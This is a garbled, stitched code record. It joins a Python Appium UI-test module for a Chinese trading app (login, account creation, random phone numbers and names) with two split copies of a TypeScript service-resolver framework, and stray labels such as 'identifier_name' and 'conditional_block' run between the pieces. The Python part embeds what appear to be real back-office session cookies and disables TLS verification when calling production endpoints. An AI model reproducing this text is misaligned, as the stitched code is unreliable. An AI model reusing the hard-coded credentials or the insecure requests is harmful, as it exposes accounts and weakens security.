    element = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[2]/android.widget.LinearLayout/android.widget.ImageView")
    element.click()
#交易tab
def click_transaction(self):
element = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[3]/android.widget.LinearLayout/android.widget.ImageView")
element.click()
#取得真實帳號資訊
def get_account_information(self):
#點我頁面TAB(Parameter)
press_my_button(self)
#點我頁面登入頭像
self.driver.find_element_by_id(package_name+":id/iv_me_head_icon").click()
#取得帳號
account_num = self.driver.find_element_by_id(package_name+":id/dialog_content_text2").text
#取得帳號級別
account_lvl = self.driver.find_element_by_id(package_name+":id/dialog_content_text3").text
self.driver.find_element_by_xpath("//*[@text='知道了']").click()
return account_num,account_lvl
#取得模擬帳號資訊
def get_demo_account_information(self):
#點我頁面TAB(Parameter)
press_my_button(self)
#點我頁面登入頭像
self.driver.find_element_by_id(package_name+":id/iv_me_head_icon").click()
#取得帳號
account_num = self.driver.find_element_by_id(package_name+":id/dialog_content_text2").text
self.driver.find_element_by_xpath("//*[@text='知道了']").click()
return account_num
#關閉分享彈窗
def close_share_window(self):
self.driver.find_element_by_id(package_name+":id/btn_cancel").click()
#點擊首頁消息中心
def click_home_message_center(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.81 ,y=y/19, count=1).perform()
#透過id
#self.driver.find_element_by_id('com.szoc.zb.cs:id/message_btn2').click()
#點擊首頁客服中心
def click_home_customer_service(self):
#透過id
#self.driver.find_element_by_id(package_name+':id/contact_btn2').click()
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.93 ,y=y/19, count=1).perform()
#點擊我頁面設置
def click_mypage_setting(self):
self.driver.find_element_by_id(package_name+":id/iv_user_center_setting").click()
#點擊我頁面消息中心
def click_mypage_message_center(self):
self.driver.find_element_by_id(package_name+":id/iv_user_center_message").click()
#點擊消息中心的返回
def click_message_center_return(self):
el2 = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.LinearLayout/android.widget.LinearLayout/android.widget.LinearLayout/android.widget.RelativeLayout/android.widget.LinearLayout[1]/android.widget.ImageView")
el2.click()
#點擊我頁面在線客服
def click_mypage_customer_service(self):
self.driver.find_element_by_id(package_name+":id/rl_user_center_live").click()
#點擊我頁面切換真實模擬
def click_mypage_switch_account(self):
self.driver.find_element_by_id(package_name+":id/tv_real_demo_switch").click()
#點擊我頁面存款
def click_mypage_deposit(self):
self.driver.find_element_by_id(package_name+":id/tv_me_main_deposit").click()
#點擊我頁面取款
def click_mypage_withdraw(self):
self.driver.find_element_by_id(package_name+":id/tv_me_main_withdraw").click()
#點擊我頁面資金明細
def click_mypage_funding_details(self):
self.driver.find_element_by_xpath("//*[@text='资金明细']").click()
#點擊首頁
def press_home_tab(self):
self.driver.find_element_by_xpath("//*[@text='首页']").click()
#點擊首頁輪播廣告
def click_home_banner(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
for i in range(3):
#點擊座標
TouchAction(self.driver).tap(element=None, x=x/2 ,y=y/5, count=1).perform()
#點擊首頁登入/註冊
def click_home_register_login(self):
#做標定位只適用螢幕大小 2340*1080
#TouchAction(self.driver).tap(x=931, y=2149).perform()
#文字定位全部適用,但定位時間較久
self.driver.find_element_by_xpath("//*[@text='登录/注册']").click()
def click_home_real_account(self):
#TouchAction(self.driver).tap(x=750, y=1300).perform()
while True:
try:
#點擊首頁開立真實賬戶
self.driver.find_element_by_id(package_name + ":id/tv_open_two").click()
break
except NoSuchElementException:
#登出+回到首頁
Logout(self)
press_home_tab(self)
skip_ads(self)
def click_home_demo_account(self):
#TouchAction(self.driver).tap(x=250, y=1300).perform()
while True:
try:
#點擊首頁開立模擬賬戶
self.driver.find_element_by_id(package_name + ":id/tv_open_one").click()
break
except NoSuchElementException:
#登出+回到首頁
Logout(self)
press_home_tab(self)
skip_ads(self)
#點擊開戶
def click_login_create_account(self):
self.driver.find_element_by_id(package_name+":id/open_account_button").click()
#點擊模擬開戶
def click_create_demo_account(self):
self.driver.find_element_by_id(package_name+":id/main_top_right_tab").click()
#關閉H5
def close_html5(self):
#關閉H5
self.driver.find_element_by_id(package_name+":id/title_left_secondary_icon").click()
#往下滑
def scroll_down(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
x1=x/2
y1=y*0.8
y2=y*0.3
#TouchAction(self.driver).press(x=x1, y=y1).move_to(x=x1, y=y2).release().perform()
self.driver.swipe(x1,y1,x1,y2,1000)
#懂你所需左滑
def clever_need_swipe_left(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#懂你所需
coordinates = self.driver.find_element_by_id(package_name+':id/home_clever_need').location
y1 = coordinates['y'] + y/10
x1 = x*0.72
x2 = x*0.6
self.driver.swipe(x1,y1,x2,y1,1000)
#懂你所需右滑
def clever_need_swipe_right(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#懂你所需
coordinates = self.driver.find_element_by_id(package_name+':id/home_clever_need').location
y1 = coordinates['y'] + y/10
x2 = x*3/4
x1 = x/4
self.driver.swipe(x1,y1,x2,y1,1000)
# Generate a random password.
def generate_random_password(self):
    """Return a random password of 7-9 characters: 6-8 alphanumerics
    followed by one guaranteed digit.

    Fix: the character set previously omitted the letter 'r'
    ('...nopqstuvwxyz...').
    """
    chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
    last_index = len(chars) - 1
    random_password = ''
    for i in range(random.randint(6,8)):
        random_password += chars[random.randint(0, last_index)]
    # Guarantee at least one digit by appending one.
    random_password += str(random.randint(0,9))
    return random_password
#隨機產生電話
def random_phone_number(self):
area_list = ['130', '131', '132', '133', '134', '135', '136', '137',
'138', '139', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159','188','189']
numbers = '0123456789'
random_phone = random.choice(area_list)
for i in range(8):
random_phone+=numbers[random.randint(0,9)]
return random_phone
#隨機產生中文名
def random_chinese_name(self):
#隨機中文名
random_name = '測試'
for i in range(2):
random_name += chr(random.randint(0x4e00, 0x9fbf))
return random_name
#產生身分證API
'''def user_id_card_api(self):
request_url = "https://www.googlespeed.cn/idcard/ajax_get_idcard"
years = str(random.randint(1940,2001))
month = str(random.randint(1,12))
days = str(random.randint(1,30))
if(len(month)==1):
month = '0'+month
if(len(years)==1):
years = '0'+years
if(len(days)==1):
days = '0'+days
payload = {'sex': random.choice(['男','女']),
'year': years,
'month': month,
'day': days}
response = requests.request("POST", request_url, headers={}, data = payload)
data = response.json()
return data['id_list'][0]['id_card']'''
# Verification-code API.
def register_demo_account_api(self,random_phone):
    """POST random_phone to the backend and return the SMS verification
    code (the 'data' field of the JSON response).
    NOTE(review): session cookies are hard-coded and will expire; the PRD
    branch also disables TLS verification (verify=False) — both are test
    conveniences, not production-safe."""
    if(package_name == 'com.szoc.zb.cs'):
        # UAT backend.
        request_url = "http://mis.will68.com/ValidateCodeLog/createValidateNo"
        payload = random_phone
        headers = {
            'Cookie': '_ga=GA1.1.280281216.1603264849; _ga_DR6HQD5SM3=GS1.1.1604370924.4.0.1604370929.0; JSESSIONID=6E3FAB6D7BD7F37DC94282001269EB03; lang_type=0; cf88_id="user:1:3dce2613-06a3-45b3-ad00-6ba6f75d79a3"',
            'Content-Type': 'text/plain'
        }
        response = requests.request("POST", request_url, headers=headers, data = payload)
        data = response.json()
        # Return the verification code.
        return data['data']
    else:
        # PRD backend.
        request_url = "https://office.cf139.com/ValidateCodeLog/createValidateNo"
        payload = random_phone
        headers = {
            'Connection': 'close',
            'authority': 'office.cf139.com',
            'accept': 'application/json, text/plain, */*',
            'user-agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1',
            'content-type': 'application/json;charset=UTF-8',
            'origin': 'https://office.cf139.com',
            'sec-fetch-site': 'same-origin',
            'sec-fetch-mode': 'cors',
            'sec-fetch-dest': 'empty',
            'referer': 'https://office.cf139.com/home/validater/validateNo',
            'accept-language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
            'cookie': 'lang_type=0; JSESSIONID=84871DBC50AD6CCE38923B5F4F7FC5DF; cf88_id="user:763:869480c1-ce0e-4232-9a65-65b9336b2cec"'
        }
        response = requests.request("POST", request_url, headers=headers, data = payload,verify = False)
        #print(response.text.encode('utf8'))
        data = response.json()
        # Return the verification code.
        return data['data']
# Whitelist API.
def White_List_API(self,random_phone):
    """Add random_phone to the backend whitelist.
    NOTE(review): the UAT branch only prints the result and implicitly
    returns None, while the PRD branch returns data['data'] — confirm
    callers tolerate both. Cookies are hard-coded; PRD disables TLS
    verification (verify=False)."""
    if(package_name == 'com.szoc.zb.cs'):
        # UAT backend.
        request_url = "http://mis.will68.com/whitelists/edit"
        payload = "{\"status\": 1, \"phone\": \""+random_phone+"\"}"
        headers = {
            'Cookie': '_ga=GA1.1.280281216.1603264849; _ga_DR6HQD5SM3=GS1.1.1604370924.4.0.1604370929.0; lang_type=0; JSESSIONID=C3883C50852D325D183B1E41F2DC8EF3; cf88_id="user:1:e7b99c9d-3916-461a-8d2d-975f7eeb18d7"',
            'Content-Type': 'application/json'
        }
        response = requests.request("POST", request_url, headers=headers, data = payload)
        data = response.json()
        print('添加白名單結果為:',data['msg'])
    else:
        # PRD backend.
        request_url = "https://office.cf139.com/whitelists/edit"
        seconds = str(int(time.time()))
        #payload = "{\"status\":1,\"remark\":\"YoYo-自動測試\",\"phone\":\""+random_phone+"\"}"
        payload = "{\"phone\":\""+random_phone+"\",\"createTime\":1608542350760,\"ip\":\"\",\"updateTime\":"+seconds+",\"remark\":\"YoYo-自動測試\",\"id\":1593,\"idNumber\":\"\",\"email\":\"\",\"status\":1}"
        headers = {
            'authority': 'office.cf139.com',
            'accept': 'application/json, text/plain, */*',
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
            'content-type': 'application/json;charset=UTF-8',
            'origin': 'https://office.cf139.com',
            'sec-fetch-site': 'same-origin',
            'sec-fetch-mode': 'cors',
            'sec-fetch-dest': 'empty',
            'referer': 'https://office.cf139.com/home/whitelist/index',
            'accept-language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
            'cookie': 'JSESSIONID=B9F4F676CC7B8728FF5EB497C6CA6FF1; cf88_id="user:763:99919735-b166-41db-bc21-fdd84d0c6734"; lang_type=0'
        }
        # latin1 re-encode works around the server's charset expectations.
        response = requests.request("POST", request_url, headers=headers, data = payload.encode("utf-8").decode("latin1"),verify = False)
        #print(response.text.encode('utf8'))
        data = response.json()
        # Return the response payload.
        return data['data']
#登入
def Login(self):
try:
#點登錄註冊
click_home_register_login(self)
el1 = self.driver.find_element_by_id(package_name+":id/loginnameEditText")
el1.clear()
el1.send_keys(main_user_id)
el2 = self.driver.find_element_by_id(package_name+":id/password")
el2.clear()
el2.send_keys(main_user_password)
el3 = self.driver.find_element_by_id(package_name+":id/sign_in_button")
el3.click()
#跳廣告
skip_ads_no_wait(self)
except NoSuchElementException:
print('已登入...\n')
#登出
def Logout(self):
#切至我的頁面
press_my_button(self)
#點擊設置
el1 = self.driver.find_element_by_id(package_name+":id/iv_user_center_setting")
el1.click()
#退出登錄
el2 = self.driver.find_element_by_xpath("//*[@text='退出登录']")
el2.click()
#確認
el3 = self.driver.find_element_by_id(package_name+":id/action_btn_pos")
el3.click()
def check_new_account_login(self,account_type,password,random_phone):
#當前時間
current_time = datetime.now().isoformat()
if(account_type=='真實'):
try:
#點立擊體驗
self.driver.find_element_by_xpath("//*[@text='立即体验']").click()
#跳過廣告(不等開屏七秒)
skip_ads_no_wait(self)
#抓取帳號資訊(Parameter)
account_num,account_lvl = get_account_information(self)
print('開戶成功!帳號為:'+account_num,'級別為:'+account_lvl)
except NoSuchElementException:
print('錯誤!開戶後無法正常進入登入後畫面')
raise AssertionError('錯誤!開戶後無法正常進入登入後畫面')
# 讀取預約表(方便寫入資料)
with open(account_csv, newline='',encoding="utf-8") as csvfile:
#讀取預約表內容並存入writed_csv
rows = csv.reader(csvfile)
writed_csv = list(rows)
#寫入(新增帳號資訊)
with open(account_csv, 'w', newline='',encoding="utf-8") as csvfile:
writer = csv.writer(csvfile)
#寫入[帳號,手機,密碼,真實/模擬,帳戶等級,當前時間,包名]
account_information = [account_num,random_phone,password,account_type,account_lvl,current_time,package_name]
writed_csv.append(account_information)
# 寫入CSV
writer.writerows(writed_csv)
else:
try:
#點立擊體驗
self.driver.find_element_by_xpath("//*[@text='立即体验']").click()
#跳過廣告(不等開屏七秒)
skip_ads_no_wait(self)
#抓取帳號資訊(Parameter)
account_num = get_demo_account_information(self)
print('開戶成功!帳號為:'+account_num)
except NoSuchElementException:
print('錯誤!開戶後無法正常進入登入後畫面')
raise AssertionError('錯誤!開戶後無法正常進入登入後畫面')
# 讀取預約表(方便寫入資料)
with open(account_csv, newline='',encoding="utf-8") as csvfile:
#讀取預約表內容並存入writed_csv
rows = csv.reader(csvfile)
writed_csv = list(rows)
#寫入(新增帳號資訊)
with open(account_csv, 'w', newline='',encoding="utf-8") as csvfile:
writer = csv.writer(csvfile)
#寫入[帳號,手機,密碼,真實/模擬,帳戶等級,當前時間,包名]
account_information = [account_num,random_phone,password,account_type,'',current_time,package_name]
writed_csv.append(account_information)
#寫入CSV
writer.writerows(writed_csv)
| idget.FrameLayout/andro | identifier_name |
app.ts |
import {
d,
o,
MaybeObservable,
Observable,
ObserverFunction,
VirtualHolder,
NodeCreatorFn
} from 'domic'
export type Instantiator<T> = new (...a: any[]) => T
/**
*
*/
export class ServiceConfig {
service: Instantiator<Service>
params: any[] = []
constructor(service: Instantiator<Service>, ...params: any[]) {
this.service = service
this.params = params
}
}
/**
*
*/
class Redirect extends Error {
screen: Screen
configs: ServiceConfig[]
constructor(screen: Screen, configs: ServiceConfig[]) {
super('redirecting')
this.screen = screen
this.configs = configs
}
}
export type ConfigMap = Map<Instantiator<Service>, ServiceConfig>
export type ServiceMap = Map<Instantiator<Service>, Service>
/**
* Resolver helps in service instanciation and destroy
*/
export class Resolver {
services: ServiceMap
configs: ConfigMap
old_resolver: Resolver | null
app: App
constructor(app: App) {
this.app = app
}
/**
* For a given service type, return an instance, creating it
* if it doesn't exist, using a matching ServiceConfig if provided.
*
* If this is not the first time the service is instanciated, try
* to reuse a previous instance as long as its config or any of its
* dependencies have not changed.
*
* @param type: A Service type
* @returns: The matching service instance
*/
require<S extends Service>(type: Instantiator<S>): S {
let service = this.services.get(type) as S
if (service) return service
let conf = this.configs.get(type)
if (conf) {
// we ignore previous service, since we are being given a new
// configuration for it.
service = new type(this.app, ...conf.params)
} else {
// try to get an older version of the service since possibly its
// configuration has not changed.
service = this.old_resolver ? this.old_resolver.services.get(type) as S : null
conf = this.old_resolver ? this.old_resolver.configs.get(type) : null
if (service) {
// browse the dependencies and check that they haven't changed themselves.
// if require() sends a different instance of the dependency, this service
// is not reused.
for (let d of service._dependencies) {
let nd = this.require((d as any).constructor)
if (d !== nd)
service = null
}
}
if (!service) {
// no config, no previously instanciated service, so
// we just create one without arguments, reusing its config if it had one previously.
let params = conf ? conf.params : []
service = new type(this.app, ...params)
}
// pull the old configuration into the new map to keep track of it.
if (conf) this.configs.set(type, conf)
}
this.services.set(type, service)
return service
}
/**
* Destroy services that won't be used anymore by calling their destroy()
* method.
*/
commit(): void {
// Destroy old service versions.
if (this.old_resolver) |
// free the old resolver so it can be garbage collected.
this.old_resolver = null
}
/**
* Call all the init() of the services.
*
* @returns: A promise of when the initiation will be done.
*/
init(): Promise<any> {
let promises: Promise<any>[] = []
this.services.forEach(serv => {
// Setup the promise chain ; basically, getInitPromise gets all the dependencies promises
// and will make their init() method wait on them.
promises.push(serv.getInitPromise(serv._dependencies.map(d => d.getInitPromise())))
})
return Promise.all(promises)
}
/**
* Prepare the resolver for a new transition.
*/
prepare(
screen: Screen,
old_resolver: Resolver,
configs: ServiceConfig[]
): void {
// Setup the config map
this.configs = new Map() as ConfigMap
this.services = new Map() as ServiceMap
this.old_resolver = old_resolver
configs.forEach(conf => this.configs.set(conf.service, conf))
screen.deps.forEach(dep => this.require(dep))
}
}
export type State = {screen: Screen, config: Map<Instantiator<Service>, ServiceConfig>}
/**
* Application
*/
export class App {
public activating = false
public current_screen: Screen = null
public resolver: Resolver = null
public services: Map<Instantiator<Service>, Service>
public config: Map<Instantiator<Service>, ServiceConfig>
public state_stack: State[] = []
public current_state_index: number = -1
public o_services: Observable<ServiceMap> = o(null)
constructor() {
window.addEventListener('popstate', ev => {
this.popstate(ev.state.state_index)
})
}
block(name: string): Block {
var block: Block = function _block(...a: any[]): View {
let v = new View(this)
let fn = a[a.length - 1]
let services = a.slice(0, a.length - 1)
v.fn = fn
v.deps = services
v.block = block
v.app = block.app
return v
} as Block
block.app = this
block._name = name
return block
// return new Block(this)
}
screen(name: string, ...views: View[]): Screen {
let screen = new Screen(this, name)
screen.define(...views)
return screen
}
/**
*
*/
go(screen: Screen, ...configs: ServiceConfig[]): Promise<any> {
if (this.activating)
// Should do some kind of redirect here ?
return Promise.reject(new Redirect(screen, configs))
try {
this.activating = true
let prev_resolver = this.resolver
this.resolver = new Resolver(this)
this.resolver.prepare(screen, prev_resolver, configs)
// wait on all the promises before transitionning to a new state.
return this.resolver.init().then(res => {
this.resolver.commit()
this.config = this.resolver.configs
this.services = this.resolver.services
this.current_screen = screen as Screen
this.activating = false
this.o_services.set(this.services)
// Replace state stack to remove all possible forward occurences...
// XXX : forward is bugged ?
this.state_stack = this.state_stack.slice(0, this.current_state_index + 1)
// Push
this.state_stack.push({
screen: this.current_screen,
config: this.config
})
this.current_state_index = this.state_stack.length - 1
window.history.pushState({state_index: this.state_stack.length - 1}, null)
}).catch(err => {
// cancel activation.
this.resolver = prev_resolver
this.activating = false
if (err.message === 'redirecting' && err.screen)
return this.go(err.screen, ...err.configs)
return Promise.reject(err)
})
} catch (err) {
this.activating = false
return Promise.reject(err)
}
}
async popstate(idx: number) {
if (this.state_stack.length === 0) return Promise.reject('no previous screen')
let state = this.state_stack[idx]
let configs: ServiceConfig[] = []
state.config.forEach(value => configs.push(value))
try {
await this.go(state.screen, ...configs)
} catch (e) {
console.error(e)
}
}
/**
*
*/
require<S extends Service>(type: Instantiator<S>): S {
return this.resolver.require(type)
}
}
/**
* A sample app, usable by default
*/
export const app = new App
export interface HasConfig<C> {
new (...a: any[]): InstanceHasConfig<C>
}
export interface InstanceHasConfig<C> extends Service {
init(c: C): any
}
/**
*
*/
export class Service {
app: App
ondestroy: (() => any)[] = []
_dependencies: Array<Service> = []
protected _initPromise: Promise<any>
constructor(app: App) {
this.app = app
}
// static with<Z, A, B, C, D, E, F>(this: new (app: App, a: A, b: B, c: C, d: D, e: E, f: F) => Z, a: A, b: B, c: C, d: D, e: E, f: F): ServiceConfig;
// static with<Z, A, B, C, D, E>(this: new (app: App, a: A, b: B, c: C, d: D, e: E) => Z, a: A, b: B, c: C, d: D, e: E): ServiceConfig;
// static with<Z, A, B, C, D>(this: new (app: App, a: A, b: B, c: C, d: D) => Z, a: A, b: B, c: C, d: D): ServiceConfig;
// static with<Z, A, B, C>(this: new (app: App, a: A, b: B, c: C) => Z, a: A, b: B, c: C): ServiceConfig;
// static with<Z, A, B>(this: new (app: App, a: A, b: B) => Z, a: A, b: B): ServiceConfig;
// static with<Z, A>(this: new (app: App, a: A) => Z, a: A): ServiceConfig;
// static with(...a: any[]) {
static conf<C>(this: HasConfig<C>, config: C) {
return new ServiceConfig(this as any, config)
}
/**
* Overload this method to perform your service initiation. You can
* return a Promise to indicate that the service may initialize itself
* asynchronously -- it may for instance perform network requests.
*
* If this service used require() for another service, then init() will
* only be called once the dependencies' init() have been resolved.
*/
public init(a: any = null): any {
return null
}
/**
*
*/
public getInitPromise(deps?: any[]): Promise<any> {
let conf = this.app.resolver.configs.get(this.constructor as typeof Service)
let params = conf ? conf.params : []
if (!this._initPromise)
this._initPromise = Promise.all(deps).then(() => this.init.apply(this, params))
return Promise.resolve(this._initPromise)
}
/**
* Require another service and put it into the list of dependencies.
*/
public require<S extends Service>(p: Instantiator<S>): S {
let serv = this.app.require(p)
this._dependencies.push(serv)
return serv as S
}
public observe<T>(a: MaybeObservable<T>, cbk: ObserverFunction<T, any>): this {
let obs = o(a).createObserver(cbk)
obs.startObserving()
this.ondestroy.push(() => obs.stopObserving())
return this
}
/**
* Override this method to tell when this partial needs to be re-inited.
*/
public needsReinit(): boolean {
for (let r of this._dependencies)
if (r.needsReinit()) return true
return false
}
destroy() {
for (let d of this.ondestroy) d()
this.onDestroy()
}
/**
* Called when destroying this Service.
* It is meant to be overridden.
*/
public onDestroy() {
}
}
/**
*
*/
export class Screen {
public blocks = new Map<Block, View>()
public deps = new Set<Instantiator<Service>>()
constructor(public app: App, public name: string) {
}
include(def: Screen): Screen {
def.blocks.forEach((view, block) => {
if (!this.blocks.has(block))
// include never overwrites blocks we would already have.
this.setBlock(block, view)
})
return this
}
extend(name: string, ...views: View[]): Screen {
let s = new Screen(this.app, name)
s.include(this)
s.define(...views)
return s
}
define(...views: View[]): Screen {
views.forEach(view => this.setBlock(view.block, view))
return this
}
protected setBlock(block: Block, view: View) {
this.blocks.set(block, view)
view.deps.forEach(dep => this.deps.add(dep))
return this
}
}
/**
* A view is a render function with Service dependencies that are resolved
* every time the application changes Screen.
*/
export class View {
public app: App
public deps: Instantiator<Service>[]
public fn: (...a: Service[]) => Node
public block: Block
constructor(app: App) {
this.app = app
}
}
/**
*
*/
export type Block = {
<A extends Service, B extends Service, C extends Service, D extends Service, E extends Service, F extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, e: Instantiator<E>, f: Instantiator<F>, fn: (a: A, b: B, c: C, d: D, e: E, f: F) => Node): View;
<A extends Service, B extends Service, C extends Service, D extends Service, E extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, e: Instantiator<E>, fn: (a: A, b: B, c: C, d: D, e: E) => Node): View;
<A extends Service, B extends Service, C extends Service, D extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, fn: (a: A, b: B, c: C, d: D) => Node): View;
<A extends Service, B extends Service, C extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, fn: (a: A, b: B, c: C) => Node): View;
<A extends Service, B extends Service>(a: Instantiator<A>, b: Instantiator<B>, fn: (a: A, b: B) => Node): View;
<A extends Service>(a: Instantiator<A>, fn: (c: A) => Node): View;
(fn: () => Node): View;
app: App
_name?: string
}
/**
*
*/
export class BlockDisplayer extends VirtualHolder {
// attrs: {
// block: Block
// }
current_view: View
current_deps: Set<Service>
name = `block ${this.block._name}`
constructor(public block: Block) {
super('block')
this.observe(this.block.app.o_services, services => {
if (!app.current_screen) return
this.update(app)
})
}
update(app: App): void {
// FIXME : check if the view has had changes in services or if
// the view object has changed.
let view = app.current_screen.blocks.get(this.block)
if (!view)
return this.updateChildren(null)
let deps = view.deps.map(type => app.services.get(type))
let newdeps = new Set<Service>(deps)
let dep_changed = !this.current_deps // compute if dependency changed.
if (this.current_deps) {
for (let d of deps) {
if (!this.current_deps.has(d)) {
dep_changed = true
break
}
}
}
if (view === this.current_view && !dep_changed)
return
this.current_view = view
this.current_deps = newdeps
// Compute the new view value.
this.updateChildren(view.fn(...deps))
}
}
/**
* Display a Block into the Tree
*/
export function DisplayBlock(block: Block): Node {
var comment = document.createComment(' DisplayBlock ')
var displayer = new BlockDisplayer(block)
displayer.addToNode(comment)
return comment
}
| {
this.old_resolver.services.forEach((serv, type) => {
if (this.services.get(type) !== serv) {
serv.destroy()
}
})
} | conditional_block |
app.ts |
import {
d,
o,
MaybeObservable,
Observable,
ObserverFunction,
VirtualHolder,
NodeCreatorFn
} from 'domic'
export type Instantiator<T> = new (...a: any[]) => T
/**
*
*/
export class ServiceConfig {
service: Instantiator<Service>
params: any[] = []
constructor(service: Instantiator<Service>, ...params: any[]) {
this.service = service
this.params = params
}
}
/**
*
*/
class Redirect extends Error {
screen: Screen
configs: ServiceConfig[]
constructor(screen: Screen, configs: ServiceConfig[]) {
super('redirecting')
this.screen = screen
this.configs = configs
}
}
export type ConfigMap = Map<Instantiator<Service>, ServiceConfig>
export type ServiceMap = Map<Instantiator<Service>, Service>
/**
* Resolver helps in service instanciation and destroy
*/
export class Resolver {
services: ServiceMap
configs: ConfigMap
old_resolver: Resolver | null
app: App
constructor(app: App) {
this.app = app
}
/**
* For a given service type, return an instance, creating it
* if it doesn't exist, using a matching ServiceConfig if provided.
*
* If this is not the first time the service is instanciated, try
* to reuse a previous instance as long as its config or any of its
* dependencies have not changed.
*
* @param type: A Service type
* @returns: The matching service instance
*/
require<S extends Service>(type: Instantiator<S>): S {
let service = this.services.get(type) as S
if (service) return service
let conf = this.configs.get(type)
if (conf) {
// we ignore previous service, since we are being given a new
// configuration for it.
service = new type(this.app, ...conf.params)
} else {
// try to get an older version of the service since possibly its
// configuration has not changed.
service = this.old_resolver ? this.old_resolver.services.get(type) as S : null
conf = this.old_resolver ? this.old_resolver.configs.get(type) : null
if (service) {
// browse the dependencies and check that they haven't changed themselves.
// if require() sends a different instance of the dependency, this service
// is not reused.
for (let d of service._dependencies) {
let nd = this.require((d as any).constructor)
if (d !== nd)
service = null
}
}
if (!service) {
// no config, no previously instanciated service, so
// we just create one without arguments, reusing its config if it had one previously.
let params = conf ? conf.params : []
service = new type(this.app, ...params)
}
// pull the old configuration into the new map to keep track of it.
if (conf) this.configs.set(type, conf)
}
this.services.set(type, service)
return service
}
/**
* Destroy services that won't be used anymore by calling their destroy()
* method.
*/
commit(): void {
// Destroy old service versions.
if (this.old_resolver) {
this.old_resolver.services.forEach((serv, type) => {
if (this.services.get(type) !== serv) {
serv.destroy()
}
})
}
// free the old resolver so it can be garbage collected.
this.old_resolver = null
}
/**
* Call all the init() of the services.
*
* @returns: A promise of when the initiation will be done.
*/
init(): Promise<any> {
let promises: Promise<any>[] = []
this.services.forEach(serv => {
// Setup the promise chain ; basically, getInitPromise gets all the dependencies promises
// and will make their init() method wait on them.
promises.push(serv.getInitPromise(serv._dependencies.map(d => d.getInitPromise())))
})
return Promise.all(promises)
}
/**
* Prepare the resolver for a new transition.
*/
prepare(
screen: Screen,
old_resolver: Resolver,
configs: ServiceConfig[]
): void {
// Setup the config map
this.configs = new Map() as ConfigMap
this.services = new Map() as ServiceMap
this.old_resolver = old_resolver
configs.forEach(conf => this.configs.set(conf.service, conf))
screen.deps.forEach(dep => this.require(dep))
}
}
export type State = {screen: Screen, config: Map<Instantiator<Service>, ServiceConfig>}
/**
* Application
*/
export class App {
public activating = false
public current_screen: Screen = null
public resolver: Resolver = null
public services: Map<Instantiator<Service>, Service>
public config: Map<Instantiator<Service>, ServiceConfig>
public state_stack: State[] = []
public current_state_index: number = -1
public o_services: Observable<ServiceMap> = o(null)
constructor() {
window.addEventListener('popstate', ev => {
this.popstate(ev.state.state_index)
})
}
block(name: string): Block {
var block: Block = function _block(...a: any[]): View {
let v = new View(this)
let fn = a[a.length - 1]
let services = a.slice(0, a.length - 1)
v.fn = fn
v.deps = services
v.block = block
v.app = block.app
return v
} as Block
block.app = this
block._name = name
return block
// return new Block(this)
}
screen(name: string, ...views: View[]): Screen {
let screen = new Screen(this, name)
screen.define(...views)
return screen
}
/**
*
*/
go(screen: Screen, ...configs: ServiceConfig[]): Promise<any> {
if (this.activating)
// Should do some kind of redirect here ?
return Promise.reject(new Redirect(screen, configs))
try {
this.activating = true
let prev_resolver = this.resolver
this.resolver = new Resolver(this)
this.resolver.prepare(screen, prev_resolver, configs)
// wait on all the promises before transitionning to a new state.
return this.resolver.init().then(res => {
this.resolver.commit()
this.config = this.resolver.configs
this.services = this.resolver.services
this.current_screen = screen as Screen
this.activating = false
this.o_services.set(this.services)
// Replace state stack to remove all possible forward occurences...
// XXX : forward is bugged ?
this.state_stack = this.state_stack.slice(0, this.current_state_index + 1)
// Push
this.state_stack.push({
screen: this.current_screen,
config: this.config
})
this.current_state_index = this.state_stack.length - 1
window.history.pushState({state_index: this.state_stack.length - 1}, null)
}).catch(err => {
// cancel activation.
this.resolver = prev_resolver
this.activating = false
if (err.message === 'redirecting' && err.screen)
return this.go(err.screen, ...err.configs)
return Promise.reject(err)
})
} catch (err) {
this.activating = false
return Promise.reject(err)
}
}
async popstate(idx: number) {
if (this.state_stack.length === 0) return Promise.reject('no previous screen')
let state = this.state_stack[idx]
let configs: ServiceConfig[] = []
state.config.forEach(value => configs.push(value))
try {
await this.go(state.screen, ...configs)
} catch (e) {
console.error(e)
}
}
/**
*
*/
